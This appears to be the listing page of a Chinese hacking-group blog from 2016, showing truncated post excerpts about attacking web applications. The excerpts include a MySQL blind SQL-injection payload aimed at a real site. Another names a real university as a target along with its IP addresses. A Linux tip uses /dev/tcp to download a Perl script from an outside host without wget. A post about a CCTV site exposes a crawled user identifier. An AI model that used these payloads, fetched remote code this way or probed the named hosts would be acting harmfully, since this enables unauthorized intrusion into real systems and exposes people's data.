0x4edf

14X security organization


接口的引入式攻击设想

2016年03月28日 - 网络安全 - 619 - 0
接口的引入式攻击设想对于逻辑参数过滤不严可进行接口的引入攻击那么这个原理基于认证基础的.\.\,可测试XSS的相关漏洞,也是相对的原理那么接口的漏洞,一般就与认证有关,就是认证当前用户,以及认证当前的状态等等一个设想的例子,存在逻辑漏洞的页面:这里就好比www.xxx.com/inc/reset?id=1其中的r...

mysql盲注常用语句

2016年03月28日 - 网络安全 - 587 - 0
 mysql盲注常用语句http://www.2cto.com/tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/@@version/**/),0x3a,floor(rand()*2))/...

友情目标:四川师范大学文理学院未深入.简单玩玩===================================、规则:静态。。jsp二级域名下有很多动态~~125.71.200.234http://125.71.200.244/ConfigWeb%5CIndex.aspxGUID应包含带4个短划线的32...

Linux渗透爱好者的小技巧

2016年03月28日 - 网络安全 - 618 - 0
Linux渗透爱好者的小技巧1.无wgetnc等下载工具时下载文件exec5<>/dev/tcp/yese.yi.org/80&&echo-e"GET/c.plHTTP/1.0\n">&5&&cat<&5&...

GET传送漏洞案例分析(CCTV为例)GET真的安全吗?原理你要在硕大的CCTV去找1个传送漏洞貌似很难不过我们就来想下我们就来爬下::/cntv:passwd爬到了一位:http://jishi.cntv.cn/program/gugong100/01/index.shtml?usrid2011=a61911%40g...